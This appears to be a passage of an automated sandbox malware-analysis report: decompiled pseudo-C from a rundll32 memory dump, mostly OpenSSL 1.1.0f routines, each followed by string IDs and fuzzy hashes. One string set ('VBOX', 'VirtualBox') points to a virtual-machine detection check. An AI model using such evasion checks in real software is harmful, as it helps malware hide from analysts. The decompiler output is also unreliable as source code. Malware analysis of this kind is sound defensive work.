                                        				E0000021E21EF3021640(2, _t324, "line ",  &_a48, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
                                        				if (_v0 ==  *((intOrPtr*)(_t441 + 0x10))) goto 0xf3033cd0;
                                        				E0000021E21EF30293C0(_t324,  *((intOrPtr*)(_t441 + 0x10)));
                                        				 *((long long*)(_t441 + 0x10)) = 0;
                                        				if (_t445 == 0) goto 0xf3033d16;
                                        				r8d = 0x16b;
                                        				E0000021E21EF3025750();
                                        				r8d = 0x16c;
                                        				E0000021E21EF3025750();
                                        				r8d = 0x16d;
                                        				E0000021E21EF3025750();
                                        				E0000021E21EF310C290();
                                        				return 0;
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %ld$..\..\openssl-1.1.0f\crypto\conf\conf_def.c$default$line
                                        • API String ID: 0-1379452798
                                        • Opcode ID: 859084852f15298ba9df795f8348e589798a38aacf1845cc27fb78756dde12f6
                                        • Instruction ID: 78ebf13ec4be32510f263fe90d278ecc7437fad48e69e6ddac01f6d80467d27a
                                        • Opcode Fuzzy Hash: 859084852f15298ba9df795f8348e589798a38aacf1845cc27fb78756dde12f6
                                        • Instruction Fuzzy Hash: 3E22BF7230468886FF658B16D8987EBABA0E761B84F464097DE8D07FD2EB7DC546C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: IPCA$VBOX$VirtualBox$vbox
                                        • API String ID: 0-3862313162
                                        • Opcode ID: 3a558d1467ed154bcedb665484e3ebc3f568674caad167e9b7a352004574b562
                                        • Instruction ID: fe8b20c855926a8d331e955983bfac52f59799c2370da02605b564876d998179
                                        • Opcode Fuzzy Hash: 3a558d1467ed154bcedb665484e3ebc3f568674caad167e9b7a352004574b562
                                        • Instruction Fuzzy Hash: F531A63230468141FE11A711AC053EBA7E1F7A4BE4F454626EE4997F9BEA3DD943C704
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF311E430(intOrPtr* __rcx, long long __rdx, long long _a16) {
                                        
                                        				_a16 = __rdx;
                                        				r9d =  *__rcx;
                                        				if (r9d != 0) goto 0xf311e458;
                                        				return 0;
                                        			}




                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpy_s
                                        • String ID:
                                        • API String ID: 1502251526-0
                                        • Opcode ID: e7efa60ed8ecf791811c52bf8fd01539573293fb11a05045d0a2fab4e6760db6
                                        • Instruction ID: 108c476338bffbbf7f443b301d47b94124ea0dc1ca47629eb98d41a30f848d09
                                        • Opcode Fuzzy Hash: e7efa60ed8ecf791811c52bf8fd01539573293fb11a05045d0a2fab4e6760db6
                                        • Instruction Fuzzy Hash: DBD1CA3271428187EB64DF55A988BEBB7E9F3A8784F058224DF4A53B45DA3CDC42CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E0000021E21EF3083590(void* __ebx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, long long __r8, void* __r9, long long __r15, long long _a8, long long _a16, signed char* _a24, intOrPtr _a32, signed char* _a40, signed char* _a48, long long _a56, long long _a64, void* _a72, signed char* _a80, signed char* _a336, signed long long _a592, long long _a616, long long _a624, long long _a720, intOrPtr* _a728, long long _a736, long long _a744) {
                                        				signed char* _v0;
                                        				long long _v16;
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				void* _t118;
                                        				void* _t119;
                                        				void* _t129;
                                        				void* _t138;
                                        				void* _t173;
                                        				signed char* _t174;
                                        				signed char* _t181;
                                        				signed char* _t183;
                                        				signed char* _t191;
                                        				void* _t210;
                                        				signed char* _t223;
                                        				void* _t224;
                                        				void* _t266;
                                        				void* _t288;
                                        				signed long long _t293;
                                        				signed char* _t296;
                                        				long long _t297;
                                        				long long _t300;
                                        				signed long long _t301;
                                        				signed long long _t302;
                                        				long long _t304;
                                        				long long _t305;
                                        				signed char* _t353;
                                        				long long _t367;
                                        				signed int _t368;
                                        				signed int _t369;
                                        				void* _t370;
                                        				signed char* _t373;
                                        				signed char* _t374;
                                        				long long _t375;
                                        				long long _t376;
                                        				void* _t377;
                                        				signed long long _t378;
                                        				intOrPtr _t417;
                                        				void* _t418;
                                        				intOrPtr _t422;
                                        				signed char* _t424;
                                        
                                        				_t348 = __rdx;
                                        				_t300 = __rbx;
                                        				E0000021E21EF310C220();
                                        				_t378 = _t377 - __rax;
                                        				_t293 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_a592 = _t293 ^ _t378;
                                        				_t418 = __r9;
                                        				_t416 = _a728;
                                        				_t370 = __rdx;
                                        				_t365 = _a720;
                                        				_t373 = __rcx;
                                        				_t414 = _a736;
                                        				_a56 = _a744;
                                        				_t296 =  *_a728;
                                        				_a64 = __r8;
                                        				_a40 = __rcx;
                                        				_a72 = _a720;
                                        				_a8 = _a736;
                                        				_a16 = 0;
                                        				if (( *_t296 & 0x00000001) != 0) goto 0xf3083634;
                                        				_v16 = 0x24;
                                        				_t15 = _t348 - 0x73; // 0x3
                                        				_t16 = _t348 - 0x10; // 0x66
                                        				r8d = _t16;
                                        				E0000021E21EF30222D0(_t15, 0x76,  *_t296 & 0x00000001, _t296, __rbx, __rcx, __rdx, __rdx, __rcx, "..\\..\\openssl-1.1.0f\\crypto\\bn\\bn_exp2.c");
                                        				goto 0xf3083c41;
                                        				_a624 = _t300;
                                        				_t173 = E0000021E21EF3043D90(_t296, __r8);
                                        				_t118 = E0000021E21EF3043D90(_t296, _a720);
                                        				_t210 = _t118;
                                        				if (_t173 != 0) goto 0xf3083668;
                                        				if (_t118 != 0) goto 0xf3083668;
                                        				_t119 = E0000021E21EF3044090(_t296, _t300, _t373, _t348);
                                        				goto 0xf3083c39;
                                        				_a616 = __r15;
                                        				_t120 =  >  ? _t173 : _t119;
                                        				_a32 =  >  ? _t173 : _t119;
                                        				E0000021E21EF3079EF0(_t296, _a736);
                                        				E0000021E21EF3079DF0(_t296, _t414, _t365);
                                        				_a24 = _t296;
                                        				E0000021E21EF3079DF0(_t296, _t414, _t365);
                                        				_a48 = _t296;
                                        				E0000021E21EF3079DF0(_t296, _t414, _t365);
                                        				_a80 = _t296;
                                        				_t374 = _t296;
                                        				E0000021E21EF3079DF0(_t296, _t414, _t365);
                                        				_a336 = _t296;
                                        				_t415 = _t296;
                                        				if (_t296 == 0) goto 0xf3083c03;
                                        				if (_a48 == 0) goto 0xf3083c03;
                                        				if (_t374 == 0) goto 0xf3083c03;
                                        				if (_t296 == 0) goto 0xf3083c03;
                                        				_t297 = _a56;
                                        				if (_t297 == 0) goto 0xf30836fc;
                                        				_a16 = _t297;
                                        				goto 0xf308372a;
                                        				E0000021E21EF30795F0(_t297);
                                        				_t422 = _a8;
                                        				_a16 = _t297;
                                        				if (_t297 == 0) goto 0xf3083c14;
                                        				if (E0000021E21EF3079670(_t297, _t297, _t297, _a728, _t370, _t422) == 0) goto 0xf3083c18;
                                        				_t30 = _t297 - 2; // 0x1
                                        				_t31 = _t297 + 3; // 0x6
                                        				r15d = _t31;
                                        				if (_t173 - 0x29f <= 0) goto 0xf3083747;
                                        				_t174 = r15d;
                                        				_v0 = _t174;
                                        				goto 0xf308377b;
                                        				if (_t174 - 0xef <= 0) goto 0xf308375a;
                                        				_v0 = 5;
                                        				goto 0xf308377b;
                                        				if (5 - 0x4f <= 0) goto 0xf308376a;
                                        				_v0 = 4;
                                        				goto 0xf308377b;
                                        				_t191 =  >  ? 3 : _t30;
                                        				_v0 = _t191;
                                        				if (_t210 - 0x29f > 0) goto 0xf30837aa;
                                        				if (_t210 - 0xef <= 0) goto 0xf3083793;
                                        				r15d = 5;
                                        				goto 0xf30837aa;
                                        				if (_t210 - 0x4f <= 0) goto 0xf30837a0;
                                        				r15d = 4;
                                        				goto 0xf30837aa;
                                        				r15d = 1;
                                        				r15d =  >  ? 3 : r15d;
                                        				if ( *((intOrPtr*)(_t370 + 0x10)) != 0) goto 0xf30837c6;
                                        				_t129 = E0000021E21EF3044130( *((intOrPtr*)(_t370 + 0x10)), _t370, _t416, _t422);
                                        				if (_t129 >= 0) goto 0xf30837c6;
                                        				goto 0xf30837eb;
                                        				_t367 = _a8;
                                        				_v16 = _t367;
                                        				0xf307ddd0();
                                        				if (_t129 == 0) goto 0xf3083c03;
                                        				if (E0000021E21EF3043C90(_t374) == 0) goto 0xf3083815;
                                        				E0000021E21EF3044090(_t297, _t300, _a40, _t374);
                                        				_a40 = 1;
                                        				_t301 = _a40;
                                        				goto 0xf3083c05;
                                        				if (E0000021E21EF3044100(_t297, _a16, _t367) == 0) goto 0xf3083c03;
                                        				_t372 = _a24;
                                        				if (_t191 - 1 <= 0) goto 0xf30838c5;
                                        				_t353 = _t374;
                                        				_v16 = _t367;
                                        				if (E0000021E21EF3079C50(_t297, _t301, _a24, _t353, _t367, _t372, _t374, _t374, _a16) == 0) goto 0xf3083c03;
                                        				_t375 = _a8;
                                        				_t48 = _t301 - 1; // 0x0
                                        				_t368 = 1 << _t48;
                                        				if (_t353 - _t368 >= 0) goto 0xf30838ca;
                                        				E0000021E21EF3079DF0(_t297, _t375, _t368);
                                        				 *((long long*)(_t378 + 0x80 + _t301 * 8)) = _t297;
                                        				if (_t297 == 0) goto 0xf3083c03;
                                        				_v16 = _t375;
                                        				if (E0000021E21EF3079C50(_t297, _t301, _t297,  *((intOrPtr*)(_t378 + 0x78 + _t301 * 8)), _t368, _t372, _t375, _t372, _a16) == 0) goto 0xf3083c03;
                                        				_t302 =  &(1[_t301]);
                                        				if (_t302 - _t368 < 0) goto 0xf3083880;
                                        				goto 0xf30838ca;
                                        				_t376 = _a8;
                                        				if ( *((intOrPtr*)(_t418 + 0x10)) != 0) goto 0xf30838e0;
                                        				_t138 = E0000021E21EF3044130( *((intOrPtr*)(_t418 + 0x10)), _t418, _t416, _t372);
                                        				if (_t138 < 0) goto 0xf3083900;
                                        				_v16 = _t376;
                                        				0xf307ddd0();
                                        				if (_t138 == 0) goto 0xf3083c03;
                                        				if (E0000021E21EF3043C90(_t296) == 0) goto 0xf3083922;
                                        				E0000021E21EF3044090(_t297, _t302, _a40, _t296);
                                        				goto 0xf3083c05;
                                        				_t417 = _a16;
                                        				if (E0000021E21EF3044100(_t297, _t417, _t376) == 0) goto 0xf3083c03;
                                        				if (r15d - 1 <= 0) goto 0xf30839c4;
                                        				_v16 = _t376;
                                        				if (E0000021E21EF3079C50(_t297, _t302, _t372, _t415, _t368, _t372, _t376, _t415, _t417) == 0) goto 0xf3083c03;
                                        				_t63 = _t422 - 1; // 0x5
                                        				_t369 = 1 << _t63;
                                        				if (_t302 - _t369 >= 0) goto 0xf30839c4;
                                        				E0000021E21EF3079DF0(_t297, _t376, _t369);
                                        				 *((long long*)(_t378 + 0x180 + _t302 * 8)) = _t297;
                                        				if (_t297 == 0) goto 0xf3083c03;
                                        				_v16 = _t376;
                                        				if (E0000021E21EF3079C50(_t297, _t302, _t297,  *((intOrPtr*)(_t378 + 0x178 + _t302 * 8)), _t369, _t372, _t376, _t372, _t417) == 0) goto 0xf3083c03;
                                        				if ( &(1[_t302]) - _t369 < 0) goto 0xf3083980;
                                        				r12d = 0;
                                        				_a24 = 1;
                                        				r14d = r12d;
                                        				E0000021E21EF3044180(_t146);
                                        				_t304 = _a8;
                                        				_t266 = E0000021E21EF3044100(_t297, _t417, _t304);
                                        				if (_t266 == 0) goto 0xf3083c03;
                                        				r13d = _a32;
                                        				r13d = r13d - 1;
                                        				if (_t266 < 0) goto 0xf3083bd4;
                                        				r12d = _t417 - 1;
                                        				_a32 = r15d - _v0;
                                        				_v0 = 2 - r15d;
                                        				if (_a24 != 0) goto 0xf3083a59;
                                        				_t298 = _a48;
                                        				_v16 = _t304;
                                        				if (E0000021E21EF3079C50(_a48, _t304, _a48, _t298, _t369, _t372, _t376, _t298, _a16) == 0) goto 0xf3083c03;
                                        				if (r12d != 0) goto 0xf3083ac9;
                                        				_t423 = _a64;
                                        				if (E0000021E21EF3043BD0(r13d, _a64) == 0) goto 0xf3083ac9;
                                        				r14d = _v0;
                                        				r14d =  &(r14d[_a32]);
                                        				r14d =  &(r14d[r12d]);
                                        				if (E0000021E21EF3043BD0(r14d, _a64) != 0) goto 0xf3083aa2;
                                        				r14d =  &(r14d[1]);
                                        				if (E0000021E21EF3043BD0(r14d, _t423) == 0) goto 0xf3083a90;
                                        				_t181 = r12d;
                                        				if (r12d - r14d < 0) goto 0xf3083ac9;
                                        				if (E0000021E21EF3043BD0(_t181, _t423) == 0) goto 0xf3083ac2;
                                        				if (_t181 - 1 - r14d >= 0) goto 0xf3083ab0;
                                        				if (r12d != 0) goto 0xf3083b38;
                                        				_t424 = _a72;
                                        				if (E0000021E21EF3043BD0(r13d, _t424) == 0) goto 0xf3083b38;
                                        				_t223 =  &(_v0[r12d]);
                                        				if (E0000021E21EF3043BD0(_t223, _t424) != 0) goto 0xf3083b10;
                                        				asm("o16 nop [eax+eax]");
                                        				_t224 = _t223 + 1;
                                        				if (E0000021E21EF3043BD0(_t224, _t424) == 0) goto 0xf3083b00;
                                        				_t183 = r12d;
                                        				if (r12d - _t224 < 0) goto 0xf3083b38;
                                        				if (E0000021E21EF3043BD0(_t183, _t424) == 0) goto 0xf3083b32;
                                        				if (_t183 - 1 - _t224 >= 0) goto 0xf3083b20;
                                        				_t305 = _a8;
                                        				if (1 == 0) goto 0xf3083b82;
                                        				if (r13d != r14d) goto 0xf3083b82;
                                        				_v16 = _t305;
                                        				if (E0000021E21EF3079C50(_t298, _t305, _a48, _a48, _t369, _t372, _t376,  *((intOrPtr*)(_t378 + 0x5d6dde8)), _a16) == 0) goto 0xf3083c03;
                                        				r15d = 0;
                                        				_a24 = r15d;
                                        				goto 0xf3083b89;
                                        				r15d = 0;
                                        				if (1 == 0) goto 0xf3083bc5;
                                        				if (r13d != _t224) goto 0xf3083bc5;
                                        				_v16 = _t305;
                                        				_t288 = E0000021E21EF3079C50(_t298, _t305, _a48, _a48, _t369, _t372, _t376,  *((intOrPtr*)(_t378 + 0x5d6dee8)), _a16);
                                        				if (_t288 == 0) goto 0xf3083c03;
                                        				_a24 = r15d;
                                        				r12d = r12d - 1;
                                        				r13d = r13d - 1;
                                        				if (_t288 >= 0) goto 0xf3083a30;
                                        				goto 0xf3083bd7;
                                        				r15d = 0;
                                        				0xf3079940();
                                        				r15d =  !=  ? 1 : r15d;
                                        				_a40 = _t424;
                                        				goto 0xf3083c05;
                                        				if (_a56 != 0) goto 0xf3083c27;
                                        				goto 0xf3083c1a;
                                        				goto 0xf3083c1f;
                                        				E0000021E21EF3079590(_a16, _a16, _a48);
                                        				E0000021E21EF3079D10(_a8);
                                        				E0000021E21EF310C290();
                                        				return 0;
                                        			}














































                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $$..\..\openssl-1.1.0f\crypto\bn\bn_exp2.c$O
                                        • API String ID: 0-2637484880
                                        • Opcode ID: cc20bd6d27a031f10e03f053677d986ef24ef94761b25ffbbabf3cbe3a1a4b30
                                        • Instruction ID: da92defd8d1666bbf10a8735156bf9f317af1873b183ca0ea1dc0b27a43aee69
                                        • Opcode Fuzzy Hash: cc20bd6d27a031f10e03f053677d986ef24ef94761b25ffbbabf3cbe3a1a4b30
                                        • Instruction Fuzzy Hash: EE028475304B8186EE609A16AC583DB67D0F7E4BC4F5A5066EE4A87F86DF7CCA42C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 52%
                                        			E0000021E21EF30E6F10(void* __rax, long long __rbx, signed char* __rcx, long long __rdx, long long __rdi, long long __r8, long long __r9, long long __r12, long long __r13, long long __r14, long long __r15) {
                                        				void* __rsi;
                                        				void* __rbp;
                                        				signed int _t135;
                                        				void* _t137;
                                        				signed int _t141;
                                        				signed int _t142;
                                        				signed int _t143;
                                        				signed int _t144;
                                        				signed int _t148;
                                        				intOrPtr _t151;
                                        				intOrPtr _t155;
                                        				intOrPtr _t158;
                                        				signed int _t159;
                                        				signed int _t167;
                                        				void* _t171;
                                        				signed int _t173;
                                        				intOrPtr _t175;
                                        				signed int _t187;
                                        				void* _t197;
                                        				void* _t202;
                                        				signed int _t214;
                                        				signed int _t216;
                                        				signed int _t218;
                                        				signed int _t220;
                                        				signed int _t222;
                                        				void* _t235;
                                        				intOrPtr* _t241;
                                        				intOrPtr* _t247;
                                        				intOrPtr* _t263;
                                        				signed long long _t266;
                                        				signed char* _t270;
                                        				signed char* _t276;
                                        				signed char* _t277;
                                        				signed char* _t278;
                                        				void* _t280;
                                        				void* _t283;
                                        				void* _t284;
                                        				signed int _t287;
                                        				long long _t302;
                                        
                                        				_t302 = __r12;
                                        				 *((long long*)(_t283 + 0x20)) = __r9;
                                        				 *((long long*)(_t283 + 0x18)) = __r8;
                                        				 *((long long*)(_t283 + 0x10)) = __rdx;
                                        				_push(_t280);
                                        				E0000021E21EF310C220();
                                        				_t284 = _t283 - __rax;
                                        				_t135 =  *__rcx & 0x000000ff;
                                        				 *((intOrPtr*)(_t284 + 0xf0)) = 0;
                                        				 *((intOrPtr*)(_t284 + 0x64)) = 1;
                                        				if (_t135 == 0) goto 0xf30e75b6;
                                        				 *((long long*)(_t284 + 0xd0)) = __rbx;
                                        				 *((long long*)(_t284 + 0xc8)) = __rdi;
                                        				 *((long long*)(_t284 + 0xc0)) = __r12;
                                        				 *((long long*)(_t284 + 0xb8)) = __r13;
                                        				 *((long long*)(_t284 + 0xb0)) = __r14;
                                        				 *((long long*)(_t284 + 0xa8)) = __r15;
                                        				if (_t135 != 0x2d) goto 0xf30e702a;
                                        				 *((intOrPtr*)(_t284 + 0x90)) = 3;
                                        				_t270 =  &(__rcx[1]);
                                        				 *((intOrPtr*)(_t284 + 0x8c)) = 3;
                                        				r14d = 3;
                                        				 *((intOrPtr*)(_t284 + 0x88)) = r14d;
                                        				r10d = 0;
                                        				r11d = 0;
                                        				 *(_t284 + 0x78) = r10d;
                                        				 *(_t284 + 0x70) = r11d;
                                        				r8d = 0;
                                        				 *(_t284 + 0x74) = 0;
                                        				 *(_t284 + 0x68) = r8d;
                                        				 *(_t284 + 0x6c) = 0;
                                        				 *((intOrPtr*)(_t284 + 0x60)) = 0;
                                        				r12d = 0;
                                        				 *(_t284 + 0x80) = _t270;
                                        				_t197 = __rdx - 0x2d - 0x2d;
                                        				if (_t197 > 0) goto 0xf30e7014;
                                        				asm("dec ecx");
                                        				if (_t197 < 0) goto 0xf30e701f;
                                        				_t137 = __rdx - 0x61;
                                        				if (_t137 - 0x19 > 0) goto 0xf30e70e4;
                                        				r12d = r12d + 1;
                                        				_t281 = _t280 + 1;
                                        				goto 0xf30e7000;
                                        				if (_t137 != 0x2b) goto 0xf30e7052;
                                        				 *((intOrPtr*)(_t284 + 0x90)) = 4;
                                        				 *((intOrPtr*)(_t284 + 0x8c)) = 4;
                                        				r14d = 4;
                                        				goto 0xf30e6fbb;
                                        				if (_t137 != 0x21) goto 0xf30e707a;
                                        				 *((intOrPtr*)(_t284 + 0x90)) = 2;
                                        				 *((intOrPtr*)(_t284 + 0x8c)) = 2;
                                        				r14d = 2;
                                        				goto 0xf30e6fbb;
                                        				if (_t137 != 0x40) goto 0xf30e70a2;
                                        				 *((intOrPtr*)(_t284 + 0x90)) = 5;
                                        				 *((intOrPtr*)(_t284 + 0x8c)) = 5;
                                        				r14d = 5;
                                        				goto 0xf30e6fbb;
                                        				 *((intOrPtr*)(_t284 + 0x90)) = 1;
                                        				r14d = 1;
                                        				 *((intOrPtr*)(_t284 + 0x88)) = r14d;
                                        				 *((intOrPtr*)(_t284 + 0x8c)) = 1;
                                        				_t202 = _t137 - 0x3b;
                                        				if (_t202 > 0) goto 0xf30e6fc3;
                                        				asm("dec ecx");
                                        				if (_t202 >= 0) goto 0xf30e6fc3;
                                        				goto 0xf30e74e3;
                                        				if (r12d == 0) goto 0xf30e73bc;
                                        				if (r14d == 5) goto 0xf30e73ac;
                                        				if (( *_t270 & 0x000000ff) != 0x2b) goto 0xf30e7107;
                                        				r13d = 1;
                                        				_t276 =  &(_t270[6]);
                                        				goto 0xf30e710a;
                                        				r13d = 0;
                                        				_t241 =  *((intOrPtr*)(_t284 + 0x108));
                                        				r14d = 0;
                                        				r15d = 0;
                                        				 *((intOrPtr*)(_t284 + 0xf0)) = r14d;
                                        				if ( *_t241 == __rdi) goto 0xf30e718a;
                                        				_t247 = _t241;
                                        				_t287 = r12d;
                                        				if (E0000021E21EF3112570(_t171, _t270,  *((intOrPtr*)( *_t247 + 8)), _t287) != 0) goto 0xf30e7157;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *_t247 + 8)) + _t280 + 1)) == r15b) goto 0xf30e71e6;
                                        				_t243 =  *((intOrPtr*)(_t284 + 0x108));
                                        				_t266 = __rdi + 1;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x108)) + _t266 * 8)) != 0xfff11ffb) goto 0xf30e7130;
                                        				r8d =  *(_t284 + 0x68);
                                        				r10d =  *(_t284 + 0x78);
                                        				r11d =  *(_t284 + 0x70);
                                        				r14d = r15d;
                                        				if ( *((intOrPtr*)(_t284 + 0x8c)) != 5) goto 0xf30e752a;
                                        				if (r12d != 8) goto 0xf30e741f;
                                        				r8d = r12d;
                                        				if (E0000021E21EF3112570( *((intOrPtr*)(_t284 + 0x60)),  *(_t284 + 0x80), "STRENGTH", _t287) != 0) goto 0xf30e7470;
                                        				E0000021E21EF30E75D0(_t243, _t243 + _t266 * 8,  *((intOrPtr*)(_t284 + 0xf8)),  *((intOrPtr*)(_t284 + 0x100)), _t266, _t276, _t280 + 1);
                                        				goto 0xf30e7493;
                                        				r15d = 1;
                                        				r10d =  *(_t284 + 0x78);
                                        				_t263 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x108)) + _t266 * 8));
                                        				_t141 =  *(_t263 + 0x14);
                                        				if (_t141 == 0) goto 0xf30e722f;
                                        				_t214 = r10d;
                                        				if (_t214 == 0) goto 0xf30e7228;
                                        				r10d = r10d & _t141;
                                        				 *(_t284 + 0x78) = r10d;
                                        				if (_t214 != 0) goto 0xf30e722f;
                                        				r8d =  *(_t284 + 0x68);
                                        				r15d = 0;
                                        				goto 0xf30e717e;
                                        				r10d = _t141;
                                        				 *(_t284 + 0x78) = _t141;
                                        				_t142 =  *(_t263 + 0x18);
                                        				r11d =  *(_t284 + 0x70);
                                        				if (_t142 == 0) goto 0xf30e7266;
                                        				_t216 = r11d;
                                        				if (_t216 == 0) goto 0xf30e725f;
                                        				r11d = r11d & _t142;
                                        				 *(_t284 + 0x70) = r11d;
                                        				if (_t216 != 0) goto 0xf30e7266;
                                        				r8d =  *(_t284 + 0x68);
                                        				r15d = 0;
                                        				goto 0xf30e7183;
                                        				r11d = _t142;
                                        				 *(_t284 + 0x70) = _t142;
                                        				_t143 =  *(_t263 + 0x1c);
                                        				_t167 =  *(_t284 + 0x74);
                                        				if (_t143 == 0) goto 0xf30e7298;
                                        				_t218 = _t167;
                                        				if (_t218 == 0) goto 0xf30e7292;
                                        				 *(_t284 + 0x74) = _t167 & _t143;
                                        				if (_t218 != 0) goto 0xf30e7298;
                                        				r8d =  *(_t284 + 0x68);
                                        				r15d = 0;
                                        				goto 0xf30e7187;
                                        				 *(_t284 + 0x74) = _t143;
                                        				_t144 =  *(_t263 + 0x20);
                                        				_t187 =  *(_t284 + 0x6c);
                                        				if (_t144 == 0) goto 0xf30e72cd;
                                        				_t220 = _t187;
                                        				if (_t220 == 0) goto 0xf30e72c7;
                                        				 *(_t284 + 0x6c) = _t187 & _t144;
                                        				if (_t220 != 0) goto 0xf30e72cd;
                                        				r8d =  *(_t284 + 0x68);
                                        				r15d = 0;
                                        				r14d = r15d;
                                        				goto 0xf30e718e;
                                        				 *(_t284 + 0x6c) = _t144;
                                        				_t173 =  *(_t263 + 0x34);
                                        				r8d =  *(_t284 + 0x68);
                                        				if (_t220 == 0) goto 0xf30e730f;
                                        				if ((r8b & 0x0000001f) == 0) goto 0xf30e7308;
                                        				_t148 = _t173 | 0xffffffe0;
                                        				r8d = r8d & _t148;
                                        				 *(_t284 + 0x68) = r8d;
                                        				_t222 = r8b & 0x0000001f;
                                        				if (_t222 != 0) goto 0xf30e730f;
                                        				r15d = 0;
                                        				r14d = r15d;
                                        				goto 0xf30e718e;
                                        				r8d = _t148;
                                        				 *(_t284 + 0x68) = _t148;
                                        				if (_t222 == 0) goto 0xf30e7337;
                                        				if ((r8b & 0x00000020) == 0) goto 0xf30e732f;
                                        				r8d = r8d & (_t173 | 0xffffffdf);
                                        				 *(_t284 + 0x68) = r8d;
                                        				if ((r8b & 0x00000020) == 0) goto 0xf30e72f5;
                                        				goto 0xf30e7337;
                                        				r8d = r8d | _t173 & 0x00000020;
                                        				 *(_t284 + 0x68) = r8d;
                                        				if ( *_t263 == 0) goto 0xf30e734a;
                                        				r14d =  *((intOrPtr*)(_t263 + 0x10));
                                        				 *((intOrPtr*)(_t284 + 0xf0)) = r14d;
                                        				goto 0xf30e7375;
                                        				_t151 =  *((intOrPtr*)(_t263 + 0x24));
                                        				if (_t151 == 0) goto 0xf30e736d;
                                        				_t175 =  *((intOrPtr*)(_t284 + 0x60));
                                        				if (_t175 == 0) goto 0xf30e735d;
                                        				if (_t175 != _t151) goto 0xf30e7399;
                                        				r14d =  *((intOrPtr*)(_t284 + 0xf0));
                                        				 *((intOrPtr*)(_t284 + 0x60)) = _t151;
                                        				goto 0xf30e7379;
                                        				r14d =  *((intOrPtr*)(_t284 + 0xf0));
                                        				if (r13d == 0) goto 0xf30e7412;
                                        				r14d =  *((intOrPtr*)(_t284 + 0x88));
                                        				goto 0xf30e6ff0;
                                        				r15d = 0;
                                        				r14d = r15d;
                                        				goto 0xf30e7192;
                                        				r14d =  *((intOrPtr*)(_t284 + 0xf0));
                                        				r15d = 0;
                                        				goto 0xf30e718e;
                                        				 *((intOrPtr*)(_t284 + 0x20)) = 0x41c;
                                        				_t108 = _t263 + 0x32; // 0x118
                                        				r8d = _t108;
                                        				E0000021E21EF30222D0(0x14, 0xe6, r13d, _t243, _t243 + _t266 * 8,  *((intOrPtr*)(_t284 + 0xf8)), _t263, _t276, _t280 + 1, "..\\..\\openssl-1.1.0f\\ssl\\ssl_ciph.c");
                                        				r8d =  *(_t284 + 0x68);
                                        				r15d = 0;
                                        				r10d =  *(_t284 + 0x78);
                                        				_t277 =  &(_t276[1]);
                                        				r11d =  *(_t284 + 0x70);
                                        				r14d =  *((intOrPtr*)(_t284 + 0xf0));
                                        				 *((intOrPtr*)(_t284 + 0x64)) = 0;
                                        				goto 0xf30e7196;
                                        				goto 0xf30e7192;
                                        				if (r12d != 0xa) goto 0xf30e7470;
                                        				_t117 = _t302 - 1; // -1
                                        				r8d = _t117;
                                        				if (E0000021E21EF3112570( *((intOrPtr*)(_t284 + 0x60)),  *(_t284 + 0x80), "SECLEVEL=", _t287) != 0) goto 0xf30e7470;
                                        				_t155 = ( *(_t284 + 0x80))[9] - 0x30;
                                        				if (_t155 - 5 > 0) goto 0xf30e7466;
                                        				 *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x110)) + 0x1c0)) = _t155;
                                        				goto 0xf30e7493;
                                        				 *((intOrPtr*)(_t284 + 0x20)) = 0x4b4;
                                        				goto 0xf30e7478;
                                        				 *((intOrPtr*)(_t284 + 0x20)) = 0x4ba;
                                        				r8d = 0x118;
                                        				_t125 = _t287 - 0x32; // -51
                                        				E0000021E21EF30222D0(0x14, _t125, _t155 - 5,  *(_t284 + 0x80), _t243 + _t266 * 8,  *((intOrPtr*)(_t284 + 0x110)), "SECLEVEL=", _t277, _t281, "..\\..\\openssl-1.1.0f\\ssl\\ssl_ciph.c");
                                        				_t158 =  !=  ? 0 : 0;
                                        				 *((intOrPtr*)(_t284 + 0x64)) = _t158;
                                        				_t159 =  *_t277 & 0x000000ff;
                                        				if (_t159 == 0) goto 0xf30e74ca;
                                        				_t235 = _t159 - 0x3b;
                                        				if (_t235 > 0) goto 0xf30e74bf;
                                        				asm("dec ecx");
                                        				if (_t235 < 0) goto 0xf30e74ca;
                                        				_t278 =  &(_t277[1]);
                                        				if ((_t277[1] & 0x000000ff) != 0) goto 0xf30e74b1;
                                        				if ( *_t278 == 0) goto 0xf30e74ee;
                                        				if (( *_t278 & 0x000000ff) != 0) goto 0xf30e6f94;
                                        				return _t158;
                                        			}











































                                        Strings
                                        Memory Dump Source
